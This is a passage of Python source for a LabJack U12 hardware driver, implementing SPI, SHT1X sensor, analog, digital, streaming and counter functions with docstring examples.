raise U12Exception("Can only read/write 1 to 18 bytes at a time.")
Data.reverse()
command[:len(Data)] = Data
bf = BitField()
bf.bit7 = int(bool(AddMsDelay))
bf.bit6 = int(bool(AddHundredUsDelay))
modeIndex = self.SPIModes.index(SPIMode)
bf[7-modeIndex] = 1
command[4] = int(bf)
# 01100010 (SPI)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit5 = 1
bf2.bit1 = 1
command[5] = int(bf2)
command[6] = NumberOfBytesToWriteRead
bf3 = BitField(rawByte = CSLineNumber)
bf3.bit7 = int(bool(ControlCS))
bf3.bit6 = int(bool(StateOfActiveCS))
command[7] = int(bf3)
self.write(command)
results = self.read()
if results[5] != command[5]:
raise U12Exception("Expected SPI response, got %s instead." % results[5])
returnDict = dict()
returnDict['DataByte3'] = results[0]
returnDict['DataByte2'] = results[1]
returnDict['DataByte1'] = results[2]
returnDict['DataByte0'] = results[3]
bfLabels = ["CSStateTris Error Flag", "SCKTris Error Flag", "MISOTris Error Flag", "MOSITris Error Flag"]
bf = BitField( rawByte = results[4], labelPrefix = "", labelList = bfLabels )
returnDict["ErrorFlags"] = bf
return returnDict
def rawSHT1X(self, Data = [3,0,0,0], WaitForMeasurementReady = True, IssueSerialReset = False, Add1MsDelay = False, Add300UsDelay = False, IO3State = 1, IO2State = 1, IO3Direction = 1, IO2Direction = 1, NumberOfBytesToWrite = 1, NumberOfBytesToRead = 3):
"""
Name: U12.rawSHT1X( Data = [3, 0, 0, 0],
WaitForMeasurementReady = True,
IssueSerialReset = False, Add1MsDelay = False,
Add300UsDelay = False, IO3State = 1, IO2State = 1,
IO3Direction = 1, IO2Direction = 1,
NumberOfBytesToWrite = 1, NumberOfBytesToRead = 3)
Args: Data, a list of bytes to write to the SHT.
WaitForMeasurementReady, Wait for the measurement ready signal.
IssueSerialReset, perform a serial reset
Add1MsDelay, adds 1ms delay
Add300UsDelay, adds a 300us delay
IO3State, sets the state of IO3
IO2State, sets the state of IO2
IO3Direction, sets the direction of IO3 ( 1 = Output )
IO2Direction, sets the direction of IO3 ( 1 = Output )
NumberOfBytesToWrite, how many bytes to write
NumberOfBytesToRead, how may bytes to read back
Desc: Sends and receives data from a SHT1X T/RH sensor from Sensirion.
See Section 5.15 of the User's Guide.
By default, reads the temperature from the SHT.
Returns: A dictionary with the following keys,
DataByte0-3, the four data bytes read
ErrorFlags, a BitField representing the error flags.
Example:
Uses an EI-1050 Temp/Humidity probe wired as follows:
Data ( Green ) -> IO0
Clock ( White ) -> IO1
Ground ( Black ) -> GND
Power ( Red ) -> +5V
Enable ( Brown ) -> IO2
>>> import u12
>>> d = u12.U12()
>>> results = d.rawSHT1X()
>>> print results
{
'DataByte3': 0,
'DataByte2': 69,
'DataByte1': 48,
'DataByte0': 25,
'ErrorFlags':
<BitField object: [ Serial Reset Error Flag = 0 (0), ... ] >
}
>>> tempC = (results['DataByte0'] * 256 ) + results['DataByte1']
>>> tempC = (tempC * 0.01) - 40
>>> print tempC
24.48
>>> results = d.rawSHT1X(Data = [5,0,0,0])
>>> print results
{
'DataByte3': 0,
'DataByte2': 200,
'DataByte1': 90,
'DataByte0': 2,
'ErrorFlags':
<BitField object: [ Serial Reset Error Flag = 0 (0), ... ] >
}
>>> sorh = (results['DataByte0'] * 256 ) + results['DataByte1']
>>> rhlinear = (-0.0000028*sorh*sorh)+(0.0405*sorh)-4.0
>>> rh = ((tempC-25.0)*(0.01+(0.00008*sorh)))+rhlinear
>>> print rh
19.3360256
"""
command = [ 0 ] * 8
if NumberOfBytesToWrite != 0:
if not isinstance(Data, list) or len(Data) > 4:
raise U12Exception("Data wasn't a list, or was too long.")
Data.reverse()
command[:len(Data)] = Data
if max(NumberOfBytesToWrite, NumberOfBytesToRead) > 4:
raise U12Exception("Can only read/write up to 4 bytes at a time.")
bf = BitField()
bf.bit7 = int(bool(WaitForMeasurementReady))
bf.bit6 = int(bool(IssueSerialReset))
bf.bit5 = int(bool(Add1MsDelay))
bf.bit4 = int(bool(Add300UsDelay))
bf.bit3 = int(bool(IO3State))
bf.bit2 = int(bool(IO2State))
bf.bit1 = int(bool(IO3Direction))
bf.bit0 = int(bool(IO2Direction))
command[4] = int(bf)
# 01101000 (SHT1X)
bf2 = BitField()
bf2.bit6 = 1
bf2.bit5 = 1
bf2.bit3 = 1
command[5] = int(bf2)
command[6] = NumberOfBytesToWrite
command[7] = NumberOfBytesToRead
self.write(command)
results = self.read()
if results[5] != command[5]:
raise U12Exception("Expected SHT1x response, got %s instead." % results[5])
returnDict = dict()
returnDict['DataByte3'] = results[0]
returnDict['DataByte2'] = results[1]
returnDict['DataByte1'] = results[2]
returnDict['DataByte0'] = results[3]
bfLabels = ["Serial Reset Error Flag", "Measurement Ready Error Flag", "Ack Error Flag"]
bf = BitField( rawByte = results[4], labelPrefix = "", labelList = bfLabels )
returnDict["ErrorFlags"] = bf
return returnDict
def eAnalogIn(self, channel, idNum = None, demo=0, gain=0):
"""
Name: U12.eAnalogIn(channel, idNum = None, demo=0, gain=0)
Args: See section 4.1 of the User's Guide
Desc: This is a simplified version of AISample. Reads the voltage from 1 analog input
>>> import u12
>>> d = u12.U12()
>>> d.eAnalogIn(0)
{'overVoltage': 0, 'idnum': 1, 'voltage': 1.435546875}
"""
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
ad0 = ctypes.c_long(999)
ad1 = ctypes.c_float(999)
ecode = staticLib.EAnalogIn(ctypes.byref(ljid), demo, channel, gain, ctypes.byref(ad0), ctypes.byref(ad1))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value, "overVoltage":ad0.value, "voltage":ad1.value}
else:
# Bits 6-4: PGA for 1st Channel
# Bits 3-0: MUX command for 1st Channel
channel0PGAMUX = ( ( gain & 7 ) << 4)
channel0PGAMUX += channel-8 if channel > 7 else channel+8
results = self.rawAISample(channel0PGAMUX = channel0PGAMUX)
return {"idnum" : self.id, "overVoltage" : int(results['PGAOvervoltage']), 'voltage' : results['Channel0']}
def eAnalogOut(self, analogOut0, analogOut1, idNum = None, demo=0):
"""
Name: U12.eAnalogOut(analogOut0, analogOut1, idNum = None, demo=0)
Args: See section 4.2 of the User's Guide
Desc: This is a simplified version of AOUpdate. Sets the voltage of both analog outputs.
>>> import u12
>>> d = u12.U12()
>>> d.eAnalogOut(2, 2)
{'idnum': 1}
"""
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
ecode = staticLib.EAnalogOut(ctypes.byref(ljid), demo, ctypes.c_float(analogOut0), ctypes.c_float(analogOut1))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value}
else:
if analogOut0 < 0:
analogOut0 = self.pwmAVoltage
if analogOut1 < 0:
analogOut1 = self.pwmBVoltage
self.rawCounterPWMDIO(PWMA = analogOut0, PWMB = analogOut1)
self.pwmAVoltage = analogOut0
self.pwmBVoltage = analogOut1
return {"idnum": self.id}
def eCount(self, idNum = None, demo = 0, resetCounter = 0):
"""
Name: U12.eCount(idNum = None, demo = 0, resetCounter = 0)
Args: See section 4.3 of the User's Guide
Desc: This is a simplified version of Counter. Reads & resets the counter (CNT).
>>> import u12
>>> d = u12.U12()
>>> d.eCount()
{'count': 1383596032.0, 'ms': 251487257.0}
"""
# Check id num
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
count = ctypes.c_double()
ms = ctypes.c_double()
ecode = staticLib.ECount(ctypes.byref(ljid), demo, resetCounter, ctypes.byref(count), ctypes.byref(ms))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value, "count":count.value, "ms":ms.value}
else:
results = self.rawCounter( ResetCounter = resetCounter)
return {"idnum":self.id, "count":results['Counter'], "ms": (time() * 1000)}
def eDigitalIn(self, channel, idNum = None, demo = 0, readD=0):
"""
Name: U12.eDigitalIn(channel, idNum = None, demo = 0, readD=0)
Args: See section 4.4 of the User's Guide
Desc: This is a simplified version of DigitalIO that reads the state of
one digital input. Also configures the requested pin to input and
leaves it that way.
>>> import u12
>>> d = u12.U12()
>>> d.eDigitalIn(0)
{'state': 0, 'idnum': 1}
"""
# Check id num
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
state = ctypes.c_long(999)
ecode = staticLib.EDigitalIn(ctypes.byref(ljid), demo, channel, readD, ctypes.byref(state))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value, "state":state.value}
else:
oldstate = self.rawDIO()
if readD:
if channel > 7:
channel = channel-7
direction = BitField(rawByte = oldstate['D15toD8Directions'])
direction[7-channel] = 1
results = self.rawDIO(D15toD8Directions = direction, UpdateDigital = True)
state = results["D15toD8States"][7-channel]
else:
direction = BitField(rawByte = oldstate['D7toD0Directions'])
direction[7-channel] = 1
results = self.rawDIO(D7ToD0Directions = direction, UpdateDigital = True)
state = results["D15toD8States"][7-channel]
else:
results = self.rawDIO(IO3toIO0DirectionsAndStates = 255, UpdateDigital = True)
state = results["IO3toIO0States"][3-channel]
return {"idnum" : self.id, "state" : state}
def eDigitalOut(self, channel, state, idNum = None, demo = 0, writeD=0):
"""
Name: U12.eDigitalOut(channel, state, idNum = None, demo = 0, writeD=0)
Args: See section 4.5 of the User's Guide
Desc: This is a simplified version of DigitalIO that sets/clears the
state of one digital output. Also configures the requested pin to
output and leaves it that way.
>>> import u12
>>> d = u12.U12()
>>> d.eDigitalOut(0, 1)
{idnum': 1}
"""
# Check id num
if idNum is None:
idNum = self.id
if ON_WINDOWS:
ljid = ctypes.c_long(idNum)
ecode = staticLib.EDigitalOut(ctypes.byref(ljid), demo, channel, writeD, state)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":ljid.value}
else:
oldstate = self.rawDIO()
if writeD:
if channel > 7:
channel = channel-7
direction = BitField(rawByte = int(oldstate['D15toD8Directions']))
direction[7-channel] = 0
states = BitField(rawByte = int(oldstate['D15toD8States']))
states[7-channel] = state
self.rawDIO(D15toD8Directions = direction, D15toD8States = state, UpdateDigital = True)
else:
direction = BitField(rawByte = int(oldstate['D7toD0Directions']))
direction[7-channel] = 0
states = BitField(rawByte = int(oldstate['D7toD0States']))
states[7-channel] = state
self.rawDIO(D7toD0Directions = direction, D7toD0States = states, UpdateDigital = True)
else:
bf = BitField()
bf[7-(channel+4)] = 0
bf[7-channel] = state
self.rawDIO(IO3toIO0DirectionsAndStates = bf, UpdateDigital = True)
return {"idnum" : self.id}
def aiSample(self, numChannels, channels, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0):
"""
Name: U12.aiSample(channels, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0)
Args: See section 4.6 of the User's Guide
Desc: Reads the voltages from 1,2, or 4 analog inputs. Also controls/reads the 4 IO ports.
>>> dev = U12()
>>> dev.aiSample(2, [0, 1])
{'stateIO': [0, 0, 0, 0], 'overVoltage': 0, 'idnum': 1, 'voltages': [1.4208984375, 1.4306640625]}
"""
# Check id num
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check to make sure that everything is checked
if not isIterable(channels): raise TypeError("channels must be iterable")
if not isIterable(gains): raise TypeError("gains must be iterable")
if len(channels) < numChannels: raise ValueError("channels must have atleast numChannels elements")
if len(gains) < numChannels: raise ValueError("gains must have atleast numChannels elements")
# Convert lists to arrays and create other ctypes
channelsArray = listToCArray(channels, ctypes.c_long)
gainsArray = listToCArray(gains, ctypes.c_long)
overVoltage = ctypes.c_long(999)
longArrayType = (ctypes.c_long * 4)
floatArrayType = (ctypes.c_float * 4)
voltages = floatArrayType(0, 0, 0, 0)
stateIOin = ctypes.c_long(stateIOin)
ecode = staticLib.AISample(ctypes.byref(idNum), demo, ctypes.byref(stateIOin), updateIO, ledOn, numChannels, ctypes.byref(channelsArray), ctypes.byref(gainsArray), disableCal, ctypes.byref(overVoltage), ctypes.byref(voltages))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "stateIO":stateIOin.value, "overVoltage":overVoltage.value, "voltages":voltages[0:numChannels]}
def aiBurst(self, numChannels, channels, scanRate, numScans, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, triggerIO=0, triggerState=0, timeout=1, transferMode=0):
"""
Name: U12.aiBurst(numChannels, channels, scanRate, numScans, idNum=None, demo=0, stateIOin=[0, 0, 0, 0], updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, triggerIO=0, triggerState=0, timeout=1, transferMode=0)
Args: See section 4.7 of the User's Guide
Desc: Reads a specified number of scans (up to 4096) at a specified scan rate (up to 8192 Hz) from 1,2, or 4 analog inputs
>>> dev = U12()
>>> dev.aiBurst(1, [0], 400, 10)
{'overVoltage': 0, 'scanRate': 400.0, 'stateIOout': <u12.c_long_Array_4096 object at 0x00DB4BC0>, 'idnum': 1, 'voltages': <u12.c_float_Array_4096_Array_4 object at 0x00DB4B70>}
"""
# Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# check list sizes
if len(channels) < numChannels: raise ValueError("channels must have atleast numChannels elements")
if len(gains) < numChannels: raise ValueError("gains must have atleast numChannels elements")
# Convert lists to arrays and create other ctypes
channelsArray = listToCArray(channels, ctypes.c_long)
gainsArray = listToCArray(gains, ctypes.c_long)
scanRate = ctypes.c_float(scanRate)
pointerArray = (ctypes.c_void_p * 4)
arr4096_type = ctypes.c_float * 4096
voltages_type = arr4096_type * 4
voltages = voltages_type()
stateIOout = (ctypes.c_long * 4096)()
overVoltage = ctypes.c_long(999)
ecode = staticLib.AIBurst(ctypes.byref(idNum), demo, stateIOin, updateIO, ledOn, numChannels, ctypes.byref(channelsArray), ctypes.byref(gainsArray), ctypes.byref(scanRate), disableCal, triggerIO, triggerState, numScans, timeout, ctypes.byref(voltages), ctypes.byref(stateIOout), ctypes.byref(overVoltage), transferMode)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "scanRate":scanRate.value, "voltages":voltages, "stateIOout":stateIOout, "overVoltage":overVoltage.value}
def aiStreamStart(self, numChannels, channels, scanRate, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, readCount=0):
"""
Name: U12.aiStreamStart(numChannels, channels, scanRate, idNum=None, demo=0, stateIOin=0, updateIO=0, ledOn=0, gains=[0, 0, 0, 0], disableCal=0, readCount=0)
Args: See section 4.8 of the User's Guide
Desc: Starts a hardware timed continuous acquisition
>>> dev = U12()
>>> dev.aiStreamStart(1, [0], 200)
{'scanRate': 200.0, 'idnum': 1}
"""
# Configure return type
staticLib.AIStreamStart.restype = ctypes.c_long
# check list sizes
if len(channels) < numChannels: raise ValueError("channels must have atleast numChannels elements")
if len(gains) < numChannels: raise ValueError("gains must have atleast numChannels elements")
#if len(stateIOin) < 4: raise ValueError("stateIOin must have atleast 4 elements")
# Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Convert lists to arrays and create other ctypes
channelsArray = listToCArray(channels, ctypes.c_long)
gainsArray = listToCArray(gains, ctypes.c_long)
scanRate = ctypes.c_float(scanRate)
ecode = staticLib.AIStreamStart(ctypes.byref(idNum), demo, stateIOin, updateIO, ledOn, numChannels, ctypes.byref(channelsArray), ctypes.byref(gainsArray), ctypes.byref(scanRate), disableCal, 0, readCount)
if ecode != 0: raise U12Exception(ecode) # TODO: Switch this out for exception
# The ID number must be saved for AIStream
self.id = idNum.value
self.streaming = True
return {"idnum":idNum.value, "scanRate":scanRate.value}
def aiStreamRead(self, numScans, localID=None, timeout=1):
"""
Name: U12.aiStreamRead(numScans, localID=None, timeout=1)
Args: See section 4.9 of the User's Guide
Desc: Waits for a specified number of scans to be available and reads them.
>>> dev = U12()
>>> dev.aiStreamStart(1, [0], 200)
>>> dev.aiStreamRead(10)
{'overVoltage': 0, 'ljScanBacklog': 0, 'stateIOout': <u12.c_long_Array_4096 object at 0x00DF4AD0>, 'reserved': 0, 'voltages': <u12.c_float_Array_4096_Array_4 object at 0x00DF4B20>}
"""
# Check to make sure that we are streaming
if not self.streaming:
raise U12Exception(-1, "Streaming has not started")
# Check id number
if localID is None:
localID = self.id
# Create arrays and other ctypes
arr4096_type = ctypes.c_float * 4096
voltages_type = arr4096_type * 4
voltages = voltages_type()
stateIOout = (ctypes.c_long * 4096)()
reserved = ctypes.c_long(0)
ljScanBacklog = ctypes.c_long(99999)
overVoltage = ctypes.c_long(999)
ecode = staticLib.AIStreamRead(localID, numScans, timeout, ctypes.byref(voltages), ctypes.byref(stateIOout), ctypes.byref(reserved), ctypes.byref(ljScanBacklog), ctypes.byref(overVoltage))
if ecode != 0: raise U12Exception(ecode) # TODO: Switch this out for exception
return {"voltages":voltages, "stateIOout":stateIOout, "reserved":reserved.value, "ljScanBacklog":ljScanBacklog.value, "overVoltage":overVoltage.value}
def aiStreamClear(self, localID=None):
"""
Name: U12.aiClear()
Args: See section 4.10 of the User's Guide
Desc: This function stops the continuous acquisition. It should be called once when finished with the stream.
>>> dev = U12()
>>> dev.aiStreamStart(1, [0], 200)
>>> dev.aiStreamRead(10)
>>> dev.aiStreamClear()
"""
# Check to make sure that we are streaming
if not self.streaming:
raise U12Exception(-1, "Streaming has not started")
# Check id number
if localID is None:
localID = self.id
ecode = staticLib.AIStreamClear(localID)
if ecode != 0: raise U12Exception(ecode) # TODO: Switch this out for exception
def aoUpdate(self, idNum=None, demo=0, trisD=None, trisIO=None, stateD=None, stateIO=None, updateDigital=0, resetCounter=0, analogOut0=0, analogOut1=0):
"""
Name: U12.aoUpdate()
Args: See section 4.11 of the User's Guide
Desc: Sets the voltages of the analog outputs. Also controls/reads all 20 digital I/O and the counter.
>>> dev = U12()
>>> dev.aoUpdate()
>>> {'count': 2, 'stateIO': 3, 'idnum': 1, 'stateD': 0}
"""
# Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check tris and state arguments
if updateDigital > 0:
if trisD is None: raise ValueError("keyword argument trisD must be set")
if trisIO is None: raise ValueError("keyword argument trisIO must be set")
if stateD is None: raise ValueError("keyword argument stateD must be set")
if stateIO is None: raise ValueError("keyword argument stateIO must be set")
# Create ctypes
if stateD is None: stateD = ctypes.c_long(0)
else: stateD = ctypes.c_long(stateD)
if stateIO is None: stateIO = ctypes.c_long(0)
else: stateIO = ctypes.c_long(stateIO)
count = ctypes.c_ushort(999)
# Create arrays and other ctypes
ecode = staticLib.AOUpdate(ctypes.byref(idNum), demo, trisD, trisIO, ctypes.byref(stateD), ctypes.byref(stateIO), updateDigital, resetCounter, ctypes.byref(count), ctypes.c_float(analogOut0), ctypes.c_float(analogOut1))
if ecode != 0: raise U12Exception(ecode) # TODO: Switch this out for exception
return {"idnum":idNum.value, "stateD":stateD.value, "stateIO":stateIO.value, "count":count.value}
def asynchConfig(self, fullA, fullB, fullC, halfA, halfB, halfC, idNum=None, demo=None, timeoutMult=1, configA=0, configB=0, configTE=0):
"""
Name: U12.asynchConfig(fullA, fullB, fullC, halfA, halfB, halfC, idNum=None, demo=None, timeoutMult=1, configA=0, configB=0, configTE=0)
Args: See section 4.12 of the User's Guide
Desc: Requires firmware V1.1 or higher. This function writes to the asynch registers and sets the direction of the D lines (input/output) as needed.
>>> dev = U12()
>>> dev.asynchConfig(96,1,1,22,2,1)
>>> {'idNum': 1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.AsynchConfig(ctypes.byref(idNum), demo, timeoutMult, configA, configB, configTE, fullA, fullB, fullC, halfA, halfB, halfC)
if ecode != 0: raise U12Exception(ecode) # TODO: Switch this out for exception
return {"idNum":idNum.value}
def asynch(self, baudrate, data, idNum=None, demo=0, portB=0, enableTE=0, enableTO=0, enableDel=0, numWrite=0, numRead=0):
"""
Name: U12.asynchConfig(fullA, fullB, fullC, halfA, halfB, halfC, idNum=None, demo=None, timeoutMult=1, configA=0, configB=0, configTE=0)
Args: See section 4.13 of the User's Guide
Desc: Requires firmware V1.1 or higher. This function writes to the asynch registers and sets the direction of the D lines (input/output) as needed.
>>> dev = U12()
>>> dev.asynch(96,1,1,22,2,1)
>>> dev.asynch(19200, [0, 0])
>>> {'data': <u12.c_long_Array_18 object at 0x00DEFB70>, 'idnum': <type 'long'>}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check size of data
if len(data) > 18: raise ValueError("data can not be larger than 18 elements")
# Make data 18 elements large
dataArray = [0] * 18
for i in range(0, len(data)):
dataArray[i] = data[i]
print dataArray
dataArray = listToCArray(dataArray, ctypes.c_long)
ecode = staticLib.Asynch(ctypes.byref(idNum), demo, portB, enableTE, enableTO, enableDel, baudrate, numWrite, numRead, ctypes.byref(dataArray))
if ecode != 0: raise U12Exception(ecode) # TODO: Switch this out for exception
return {"idnum":long, "data":dataArray}
GainMapping = [ 1.0, 2.0, 4.0, 5.0, 8.0, 10.0, 16.0, 20.0 ]
def bitsToVolts(self, chnum, chgain, bits):
"""
Name: U12.bitsToVolts(chnum, chgain, bits)
Args: See section 4.14 of the User's Guide
Desc: Converts a 12-bit (0-4095) binary value into a LabJack voltage. No hardware communication is involved.
>>> dev = U12()
>>> dev.bitsToVolts(0, 0, 2662)
>>> {'volts': 2.998046875}
"""
if ON_WINDOWS:
volts = ctypes.c_float()
ecode = staticLib.BitsToVolts(chnum, chgain, bits, ctypes.byref(volts))
if ecode != 0: print ecode
return volts.value
else:
if chnum < 8:
return ( float(bits) * 20.0 / 4096.0 ) - 10.0
else:
volts = ( float(bits) * 40.0 / 4096.0 ) - 20.0
return volts / self.GainMapping[chgain]
def voltsToBits(self, chnum, chgain, volts):
"""
Name: U12.voltsToBits(chnum, chgain, bits)
Args: See section 4.15 of the User's Guide
Desc: Converts a voltage to it's 12-bit (0-4095) binary representation. No hardware communication is involved.
>>> dev = U12()
>>> dev.voltsToBits(0, 0, 3)
>>> {'bits': 2662}
"""
if ON_WINDOWS:
bits = ctypes.c_long(999)
ecode = staticLib.VoltsToBits(chnum, chgain, ctypes.c_float(volts), ctypes.byref(bits))
if ecode != 0: raise U12Exception(ecode)
return bits.value
else:
pass
#*bits = RoundFL((volts+10.0F)/(20.0F/4096.0F));
def counter(self, idNum=None, demo=0, resetCounter=0, enableSTB=1):
"""
Name: U12.counter(idNum=None, demo=0, resetCounter=0, enableSTB=1)
Args: See section 4.15 of the User's Guide
Desc: Converts a voltage to it's 12-bit (0-4095) binary representation. No hardware communication is involved.
>>> dev = U12()
>>> dev.counter(0, 0, 3)
>>> {'bits': 2662}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Create ctypes
stateD = ctypes.c_long(999)
stateIO = ctypes.c_long(999)
count = ctypes.c_ulong(999)
print idNum
ecode = staticLib.Counter(ctypes.byref(idNum), demo, ctypes.byref(stateD), ctypes.byref(stateIO), resetCounter, enableSTB, ctypes.byref(count))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "stateD": stateD.value, "stateIO":stateIO.value, "count":count.value}
def digitalIO(self, idNum=None, demo=0, trisD=None, trisIO=None, stateD=None, stateIO=None, updateDigital=0):
"""
Name: U12.digitalIO(idNum=None, demo=0, trisD=None, trisIO=None, stateD=None, stateIO=None, updateDigital=0)
Args: See section 4.17 of the User's Guide
Desc: Reads and writes to all 20 digital I/O.
>>> dev = U12()
>>> dev.digitalIO()
>>> {'stateIO': 0, 'stateD': 0, 'idnum': 1, 'outputD': 0, 'trisD': 0}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
# Check tris and state parameters
if updateDigital > 0:
if trisD is None: raise ValueError("keyword argument trisD must be set")
if trisIO is None: raise ValueError("keyword argument trisIO must be set")
if stateD is None: raise ValueError("keyword argument stateD must be set")
if stateIO is None: raise ValueError("keyword argument stateIO must be set")
# Create ctypes
if trisD is None: trisD = ctypes.c_long(999)
else:trisD = ctypes.c_long(trisD)
if stateD is None:stateD = ctypes.c_long(999)
else: stateD = ctypes.c_long(stateD)
if stateIO is None: stateIO = ctypes.c_long(0)
else: stateIO = ctypes.c_long(stateIO)
outputD = ctypes.c_long(999)
# Check trisIO
if trisIO is None: trisIO = 0
ecode = staticLib.DigitalIO(ctypes.byref(idNum), demo, ctypes.byref(trisD), trisIO, ctypes.byref(stateD), ctypes.byref(stateIO), updateDigital, ctypes.byref(outputD))
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value, "trisD":trisD.value, "stateD":stateD.value, "stateIO":stateIO.value, "outputD":outputD.value}
def getDriverVersion(self):
"""
Name: U12.getDriverVersion()
Args: See section 4.18 of the User's Guide
Desc: Returns the version number of ljackuw.dll. No hardware communication is involved.
>>> dev = U12()
>>> dev.getDriverVersion()
>>> 1.21000003815
"""
staticLib.GetDriverVersion.restype = ctypes.c_float
return staticLib.GetDriverVersion()
def getFirmwareVersion(self, idNum=None):
"""
Name: U12.getErrorString(idnum=None)
Args: See section 4.20 of the User's Guide
Desc: Retrieves the firmware version from the LabJack's processor
>>> dev = U12()
>>> dev.getFirmwareVersion()
>>> Unkown error
"""
# Check ID number
if idNum is None: idNum = self.id
idNum = ctypes.c_long(idNum)
staticLib.GetFirmwareVersion.restype = ctypes.c_float
firmware = staticLib.GetFirmwareVersion(ctypes.byref(idNum))
if firmware > 512: raise U12Exception(firmware-512)
return {"idnum" : idNum.value, "firmware" : firmware}
def getWinVersion(self):
"""
Name: U12.getErrorString()
Args: See section 4.21 of the User's Guide
Desc: Uses a Windows API function to get the OS version
>>> dev = U12()
>>> dev.getWinVersion()
>>> {'majorVersion': 5L, 'minorVersion': 1L, 'platformID': 2L, 'buildNumber': 2600L, 'servicePackMajor': 2L, 'servicePackMinor': 0L}
"""
# Create ctypes
majorVersion = ctypes.c_ulong()
minorVersion = ctypes.c_ulong()
buildNumber = ctypes.c_ulong()
platformID = ctypes.c_ulong()
servicePackMajor = ctypes.c_ulong()
servicePackMinor = ctypes.c_ulong()
ecode = staticLib.GetWinVersion(ctypes.byref(majorVersion), ctypes.byref(minorVersion), ctypes.byref(buildNumber), ctypes.byref(platformID), ctypes.byref(servicePackMajor), ctypes.byref(servicePackMinor))
if ecode != 0: raise U12Exception(ecode)
return {"majorVersion":majorVersion.value, "minorVersion":minorVersion.value, "buildNumber":buildNumber.value, "platformID":platformID.value, "servicePackMajor":servicePackMajor.value, "servicePackMinor":servicePackMinor.value}
def listAll(self):
"""
Name: U12.listAll()
Args: See section 4.22 of the User's Guide
Desc: Searches the USB for all LabJacks, and returns the serial number and local ID for each
>>> dev = U12()
>>> dev.listAll()
>>> {'serialnumList': <u12.c_long_Array_127 object at 0x00E2AD50>, 'numberFound': 1, 'localIDList': <u12.c_long_Array_127 object at 0x00E2ADA0>}
"""
# Create arrays and ctypes
productIDList = listToCArray([0]*127, ctypes.c_long)
serialnumList = listToCArray([0]*127, ctypes.c_long)
localIDList = listToCArray([0]*127, ctypes.c_long)
powerList = listToCArray([0]*127, ctypes.c_long)
arr127_type = ctypes.c_long * 127
calMatrix_type = arr127_type * 20
calMatrix = calMatrix_type()
reserved = ctypes.c_long()
numberFound = ctypes.c_long()
ecode = staticLib.ListAll(ctypes.byref(productIDList), ctypes.byref(serialnumList), ctypes.byref(localIDList), ctypes.byref(powerList), ctypes.byref(calMatrix), ctypes.byref(numberFound), ctypes.byref(reserved), ctypes.byref(reserved))
if ecode != 0: raise U12Exception(ecode)
return {"serialnumList": serialnumList, "localIDList":localIDList, "numberFound":numberFound.value}
def localID(self, localID, idNum=None):
"""
Name: U12.localID(localID, idNum=None)
Args: See section 4.23 of the User's Guide
Desc: Changes the local ID of a specified LabJack
>>> dev = U12()
>>> dev.localID(1)
>>> {'idnum':1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.LocalID(ctypes.byref(idNum), localID)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def noThread(self, noThread, idNum=None):
"""
Name: U12.localID(noThread, idNum=None)
Args: See section 4.24 of the User's Guide
Desc: This function is needed when interfacing TestPoint to the LabJack DLL on Windows 98/ME
>>> dev = U12()
>>> dev.noThread(1)
>>> {'idnum':1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.NoThread(ctypes.byref(idNum), noThread)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def pulseOut(self, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0):
"""
Name: U12.pulseOut(bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0)
Args: See section 4.25 of the User's Guide
Desc: This command creates pulses on any/all of D0-D7
>>> dev = U12()
>>> dev.pulseOut(0, 1, 1, 1, 1, 1)
>>> {'idnum':1}
"""
#Check id number
if idNum is None:
idNum = self.id
idNum = ctypes.c_long(idNum)
ecode = staticLib.PulseOut(ctypes.byref(idNum), demo, lowFirst, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2)
if ecode != 0: raise U12Exception(ecode)
return {"idnum":idNum.value}
def pulseOutStart(self, bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0):
"""
Name: U12.pulseOutStart(bitSelect, numPulses, timeB1, timeC1, timeB2, timeC2, idNum=None, demo=0, lowFirst=0)
Args: See section 4.26 of the User's Guide
Desc: PulseOutStart and PulseOutFinish are used as an alternative to PulseOut (See PulseOut for more information)
>>> dev = U12()
